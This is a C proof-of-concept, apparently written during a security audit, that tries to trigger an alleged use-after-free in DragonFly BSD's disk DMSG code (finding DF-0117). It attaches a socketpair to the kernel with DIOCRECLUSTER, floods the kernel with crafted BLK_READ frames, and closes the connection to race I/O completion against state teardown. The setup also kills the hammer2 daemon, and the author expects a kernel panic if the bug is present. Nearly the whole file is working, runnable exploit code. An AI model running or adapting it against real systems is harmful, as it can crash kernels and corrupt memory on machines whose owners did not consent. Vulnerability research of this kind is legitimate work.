/*
 * DF-0117 PoC (self-contained trigger) -- attempt to reproduce the alleged
 * UAF on kdmsg_state in diskiodone (sys/kern/subr_diskiocom.c:580/582/650).
 *
 * Claim under test (finding DF-0117):
 *   In disk_blk_read/write/flush/freeblks the kdmsg state pointer is stored
 *   in bio->bio_caller_info1.ptr and dispatched to dev_dstrategy() async,
 *   but NO reference is taken on the state (kdmsg_state_hold() is commented
 *   out at subr_diskiocom.c:375/451/503/554, drop at :661).  If the kdmsg
 *   peer sends DELETE or the connection drops while I/O is in flight, the
 *   kdmsg core frees the state; when diskiodone fires on completion it
 *   dereferences the freed state (:580/:582/:650) -> UAF.
 *
 * Setup solved (reused from sibling finding DF-0017):
 *   A DMSG iocom fd is attached to the kernel disk-iocom parser by opening
 *   a raw disk device node and issuing DIOCRECLUSTER (sys/sys/diskslice.h)
 *   with one end of an AF_UNIX socketpair.  We then drive wire DMSG messages
 *   on the other end.  The hammer2 userland daemon pre-connects every disk
 *   iocom at boot via DIOCRECLUSTER and would deadlock a follow-on reconnect,
 *   so run.sh does `pkill -9 -x hammer2` first to free the disk iocom.
 *
 * Strategy (single-shot per process to avoid the reconnect deadlock):
 *   1. Establish the iocom ONCE (open /dev/vbd0, socketpair, DIOCRECLUSTER).
 *   2. Send a large burst of DMSG_BLK_READ|CREATE[|DELETE] messages, each
 *      dispatching a real async disk I/O on the root disk via dev_dstrategy,
 *      storing bio->bio_caller_info1.ptr = msg->state with NO state hold.
 *   3. Race the I/O completions against state teardown: optionally send
 *      explicit DELETE on every state, then close the socket -> reader EOF
 *      -> writer-thread teardown -> kdmsg_simulate_failure(state0) walks +
 *      aborts + frees all states.
 *      If the UAF is real, a diskiodone dereferences a freed kdmsg_state_t
 *      and the INVARIANTS kernel panics (KKASSERT in kdmsg_state_free or a
 *      page fault on freed slab memory).
 *   4. Wait for the teardown to drain, then exit.  run.sh re-runs with a
 *      guest reset between variants.
 *
 * Build (DragonFly, any user):
 *   cc -O2 -o trigger trigger.c -lpthread
 *
 * Run (as ROOT -- needs /dev/vbd0 + DIOCRECLUSTER):
 *   ./trigger [nreads] [mode] [preclose_us]
 *     nreads        default 256
 *     mode          0 = CREATE only (eof=0)
 *                   1 = CREATE|DELETE (eof=1)
 *                   2 = CREATE then explicit DELETE msg on each state
 *     preclose_us   default 2000 (delay between burst and socket close)
 *
 * Expected (bug present): kernel panic in diskiodone / kdmsg_state_free /
 *   page fault on freed kdmsg_state_t memory (captured in boot.log).
 * Expected (state protected by topology refs): trigger exits cleanly,
 *   guest stays up, dmesg clean.
 *
 * WARNING: may panic a vulnerable kernel.  Run only on a disposable VM.
 */

#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/diskslice.h>	/* DIOCRECLUSTER, struct disk_ioc_recluster */
#include <sys/dmsg.h>
#include <sys/socket.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <err.h>

#define DMSG_DISK	"/dev/vbd0"

/* dmsg base wire header is 64 bytes; BLK_READ extended header is 128 bytes
 * (SIZE field = 2, hbytes = 2*64 per kern_dmsg.c:348).  Only the first 32
 * bytes after the base head carry blk_read fields; the rest is padding the
 * reader still consumes.  We send the full 128. */
#define BLK_READ_HDR_BYTES	128

/*
 * Userland image of one BLK_READ message exactly as this PoC writes it to
 * the socket: the base dmsg header followed by the blk_read fields and
 * trailing padding.  The struct is packed so the compiler inserts no
 * padding of its own between members; mk_blk_read() overlays it on a
 * BLK_READ_HDR_BYTES-sized buffer.
 *
 * The +0x.. offsets in the member comments assume dmsg_hdr_t is 64 bytes
 * (it is declared in <sys/dmsg.h>, not here).
 */
struct blk_read_wire {
	dmsg_hdr_t		hdr;		/* 64 bytes */
	uint64_t		keyid;		/* +0x40 */
	uint64_t		offset;		/* +0x48 */
	uint32_t		bytes;		/* +0x50 */
	uint32_t		flags;		/* +0x54 */
	uint32_t		reserved01;	/* +0x58 */
	uint32_t		reserved02;	/* +0x5c */
	unsigned char		pad[32];	/* +0x60 .. +0x7f (reader reads 128) */
} __attribute__((packed));

/*
 * Fill buf with a single BLK_READ wire message.
 *
 *   buf      destination; BLK_READ_HDR_BYTES bytes are overwritten
 *   cmd      stored verbatim in the header: DMSG_BLK_READ, possibly OR'd
 *            with DMSGF_CREATE / DMSGF_DELETE (the caller supplies a value
 *            that already carries the SIZE field)
 *   msgid    identifies the transaction
 *   circuit  selects the parent state (0 == state0 == top-level
 *            transaction)
 *   offset   copied into the message's offset field
 *   bytes    copied into the message's bytes field
 *
 * Every field not listed above -- aux_bytes, aux_crc, hdr_crc, keyid, flags,
 * the reserved words and the padding -- is left zero by the initial clear.
 * hdr_crc in particular is deliberately not computed (original author's
 * note: the receive path does not verify it).
 */
static void
mk_blk_read(void *buf, uint32_t cmd, uint64_t msgid, uint64_t circuit,
    uint64_t offset, uint32_t bytes)
{
	/* Clear the whole frame first; memset hands back buf itself. */
	struct blk_read_wire *msg = memset(buf, 0, BLK_READ_HDR_BYTES);

	/* base header */
	msg->hdr.magic = DMSG_HDR_MAGIC;	/* 0x4832 */
	msg->hdr.cmd = cmd;
	msg->hdr.msgid = msgid;
	msg->hdr.circuit = circuit;

	/* blk_read fields */
	msg->offset = offset;
	msg->bytes = bytes;
}

/*
 * Drain thread: read & discard whatever the kernel writes back (LNK_CONN,
 * BLK_ERROR replies, LNK_PING...) so the socket send buffer never fills and
 * deadlocks the kernel's writer thread.
 *
 *   arg      pointer to an int holding the descriptor to drain; the value
 *            is copied once on entry
 *   returns  NULL, once read() reports EOF or a non-retryable error
 *
 * A read() interrupted by a signal (EINTR) is retried instead of ending the
 * thread: giving up on a transient error would leave nobody consuming the
 * kernel's replies.
 */
static void *
drain(void *arg)
{
	int fd = *(int *)arg;
	char buf[8192];

	for (;;) {
		ssize_t n = read(fd, buf, sizeof(buf));

		if (n > 0)
			continue;		/* data discarded */
		if (n < 0 && errno == EINTR)
			continue;		/* transient, try again */
		break;				/* EOF or hard error */
	}
	return NULL;
}

/*
 * Write one complete BLK_READ_HDR_BYTES frame to fd.
 *
 * Short writes are continued and EINTR is retried so a frame is never left
 * half-sent (a partial frame would misalign every message after it on the
 * stream socket).  Returns 0 on success, -1 with errno set on failure.
 */
static int
send_frame(int fd, const char *frame)
{
	size_t off = 0;

	while (off < BLK_READ_HDR_BYTES) {
		ssize_t rv = write(fd, frame + off, BLK_READ_HDR_BYTES - off);

		if (rv < 0) {
			if (errno == EINTR)
				continue;
			return -1;
		}
		if (rv == 0) {
			/* no progress; do not spin forever */
			errno = EIO;
			return -1;
		}
		off += (size_t)rv;
	}
	return 0;
}

/*
 * Usage: ./trigger [nreads] [mode] [preclose_us]
 *
 *   nreads       number of BLK_READ transactions to open (default 256,
 *                values below 1 are raised to 1)
 *   mode         0 = CREATE only, 1 = CREATE|DELETE, 2 = CREATE followed by
 *                a separate DELETE message per transaction; any other value
 *                behaves like 0
 *   preclose_us  microseconds to wait between the burst and the socket
 *                teardown (default 2000, negative values are treated as 0)
 *
 * Steps: open DMSG_DISK, hand one end of a socketpair to the kernel with
 * DIOCRECLUSTER, send the burst on the other end, tear the socket down,
 * wait, and exit 0.  Setup failures terminate via err(3) with status 1.
 */
int
main(int argc, char **argv)
{
	setvbuf(stderr, NULL, _IONBF, 0);
	int nreads      = (argc > 1) ? atoi(argv[1]) : 256;
	int mode        = (argc > 2) ? atoi(argv[2]) : 0;
	int preclose_us = (argc > 3) ? atoi(argv[3]) : 2000;
	if (nreads < 1)
		nreads = 1;
	/* usleep() takes an unsigned count; a negative int would become a
	 * huge delay after conversion. */
	if (preclose_us < 0)
		preclose_us = 0;

	int diskfd = open(DMSG_DISK, O_RDWR);
	if (diskfd < 0)
		err(1, "open %s (need root/operator for DIOCRECLUSTER)", DMSG_DISK);
	fprintf(stderr, "[*] opened %s fd=%d; nreads=%d mode=%d\n",
	    DMSG_DISK, diskfd, nreads, mode);

	int sv[2];
	if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0)
		err(1, "socketpair");
	int sv_kern = sv[0], sv_us = sv[1];

	/* The drain thread reads its descriptor through this pointer when it
	 * starts, so give it a variable that main never modifies. */
	int drain_fd = sv_us;
	pthread_t dt;
	int rc = pthread_create(&dt, NULL, drain, &drain_fd);
	if (rc != 0) {
		errno = rc;		/* pthread_* return the error code */
		err(1, "pthread_create");
	}

	struct disk_ioc_recluster recl;
	memset(&recl, 0, sizeof(recl));
	recl.fd = sv_kern;
	if (ioctl(diskfd, DIOCRECLUSTER, &recl) < 0)
		err(1, "DIOCRECLUSTER");
	fprintf(stderr, "[1] DIOCRECLUSTER ok (sv_kern=%d sv_us=%d)\n",
	    sv_kern, sv_us);

	char buf[BLK_READ_HDR_BYTES];
	uint32_t basecmd = DMSG_BLK_READ;			/* 0x00500302 */
	uint32_t create_flags;
	switch (mode) {
	case 1:  create_flags = DMSGF_CREATE | DMSGF_DELETE; break;	/* eof=1 */
	case 2:  create_flags = DMSGF_CREATE; break;			/* DEL later */
	default: create_flags = DMSGF_CREATE; break;			/* eof=0 */
	}

	/* dispatch a burst of reads -- per the finding under test, each CREATE
	 * makes a new kdmsg state and dispatches one async disk I/O that
	 * stores a raw state pointer with NO state hold.  msgids are 1..N. */
	int sent = 0;
	for (int i = 0; i < nreads; i++) {
		uint64_t msgid = (uint64_t)(i + 1);
		mk_blk_read(buf, basecmd | create_flags, msgid, 0, 0, 512);
		if (send_frame(sv_us, buf) < 0) {
			/* the stream is unusable or misaligned from here on */
			warn("write BLK_READ i=%d", i);
			break;
		}
		sent++;
	}
	fprintf(stderr, "[2] wrote %d BLK_READ|CREATE messages\n", sent);

	if (mode == 2) {
		/* send explicit DELETE on each state that was actually created,
		 * to drive rxcmd |= DELETE (and another round of I/O dispatch)
		 * before teardown */
		int deleted = 0;
		for (int i = 0; i < sent; i++) {
			uint64_t msgid = (uint64_t)(i + 1);
			mk_blk_read(buf, basecmd | DMSGF_DELETE, msgid, 0, 0, 512);
			if (send_frame(sv_us, buf) < 0) {
				warn("write BLK_READ|DELETE i=%d", i);
				break;
			}
			deleted++;
		}
		fprintf(stderr, "[2a] wrote %d BLK_READ|DELETE messages\n",
		    deleted);
	}

	/* let some I/Os land in flight, then tear the connection down --
	 * races diskiodone vs writer-thread kdmsg_simulate_failure teardown */
	usleep(preclose_us);

	fprintf(stderr, "[3] closing sv_us -> reader EOF -> teardown race\n");
	/* The drain thread is normally blocked in read() on this socket.
	 * close() alone is not guaranteed to wake it or to signal EOF to the
	 * peer while that read is outstanding; shutdown() does both right
	 * away, so the teardown starts now and pthread_join() cannot stall. */
	if (shutdown(sv_us, SHUT_RDWR) < 0)
		warn("shutdown sv_us");
	close(sv_us);
	sv_us = -1;

	/* give the writer teardown loop (hz/2 sleeps) plenty of time to drain
	 * all states through diskiodone */
	fprintf(stderr, "[4] waiting 4s for teardown to complete...\n");
	sleep(4);

	/* drain thread exits once its socket end has been shut down */
	pthread_join(dt, NULL);

	fprintf(stderr,
	    "[done] %d reads dispatched; no panic observed by userspace\n",
	    sent);
	close(diskfd);
	return 0;
}
